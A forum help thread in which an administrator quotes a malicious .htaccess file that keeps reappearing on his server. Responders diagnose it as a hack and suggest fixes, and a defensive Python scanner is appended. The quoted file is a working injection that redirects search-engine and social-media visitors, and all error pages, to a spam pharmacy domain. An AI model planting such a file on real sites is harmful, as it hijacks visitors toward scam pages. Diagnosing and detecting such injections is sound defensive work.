Security Risk ? htaccess file appearing in my website folders

MikeMCSD
This file ".htaccess" is being placed on my server (Win 2008 R2)
in a number of folders where I have my websites,
including the  "wwwroot" folder.
Here are the contents of this file:

Options -Indexes
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*youtube.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*blog.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://onlinemedsmedicine.ru/ [R,L]
ErrorDocument 401 http://onlinemedsmedicine.ru/
ErrorDocument 403 http://onlinemedsmedicine.ru/
ErrorDocument 404 http://onlinemedsmedicine.ru/
ErrorDocument 500 http://onlinemedsmedicine.ru/

I have to log into the server every few days and delete them.

Are these files dangerous?
How are they putting these files there?
Any way of stopping this?
Thanks
Steven Carnahan
Assistant Vice President\Network Manager

Commented:
Dave Baldwin
Fixer of Problems
Most Valuable Expert 2014
Commented:
That is redirecting your visitors to fake drug sites.  At the very least you should change your FTP and/or account password to see if you can stop this from happening.  You might also want to contact your web hosting company and tell them in case someone has broken into the server.

Author

Commented:
Thanks guys... I read this:

"For sites hosted on Apache one of the most common ways this type of hack is accomplished is a hack of an Apache file named .htaccess."

If the .htaccess file is for Apache and I'm using IIS, would the attack even work at all?
Dave Baldwin
Fixer of Problems
Most Valuable Expert 2014

Commented:
There is an addin for IIS that uses '.htaccess' but otherwise, I don't think so.  Still, the fact that it reappears means that you have a security hole.
Assistant Vice President\Network Manager
Commented:
There is certainly something wrong since it continues to return.

Something you could try while you are trying to find the issue is to create a generic .htaccess file and set it to read only. That may prevent the redirects in the short run.

*** This is not a solution and should not be the final step you take ***

Author

Commented:
Thanks guys...

I deleted the contents of the .htaccess file and set it to Read Only.
That seems to have prevented the file from being updated.
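
Added example (not code from any poster in this thread): since the file keeps reappearing in several folders, a scan can flag every .htaccess under the web root that sends visitors or error pages to a host you do not own, which are the two things the file quoted in the question does. The function names, the `own_hosts` parameter and the placeholder host `redirect.example.invalid` are assumptions made for this example.

```python
import os
import re
from urllib.parse import urlparse

REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I)
REWRITE_RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)
ERROR_DOC = re.compile(r"^\s*ErrorDocument\s+(\d{3})\s+(\S+)", re.I)

# Constructed sample shaped like the file in the question; the host is a placeholder.
SAMPLE = """\
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC]
RewriteRule .* http://redirect.example.invalid/ [R,L]
ErrorDocument 404 http://redirect.example.invalid/
ErrorDocument 403 /errors/403.html
"""

def external_host(target, own_hosts):
    """Host of an absolute http(s) URL that is not one of ours, else None."""
    url = urlparse(target)
    host = (url.hostname or "").lower()
    return host if url.scheme in ("http", "https") and host and host not in own_hosts else None

def audit_htaccess(text, own_hosts=()):
    """Return [(line_no, finding)] for off-site redirects and error pages."""
    own = {h.lower() for h in own_hosts}
    findings, referer_conds = [], 0
    for no, line in enumerate(text.splitlines(), 1):
        if REFERER_COND.match(line):
            referer_conds += 1  # condition belongs to the next RewriteRule
        elif m := REWRITE_RULE.match(line):
            if host := external_host(m.group(1), own):
                kind = "referer-conditioned redirect" if referer_conds else "redirect"
                findings.append((no, f"{kind} to {host}"))
            referer_conds = 0  # the rule consumed the pending conditions
        elif m := ERROR_DOC.match(line):
            if host := external_host(m.group(2), own):
                findings.append((no, f"ErrorDocument {m.group(1)} to {host}"))
    return findings

def scan_tree(root, own_hosts=()):
    """Audit every .htaccess under root; returns {path: findings} for flagged files."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in (f for f in files if f.lower() == ".htaccess"):
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits[path] = audit_htaccess(fh.read(), own_hosts)
    return {p: f for p, f in hits.items() if f}
```

Running `scan_tree` on the web root on a schedule and alerting on a non-empty result shows when and in which folders the file comes back, which helps narrow down how it is being written.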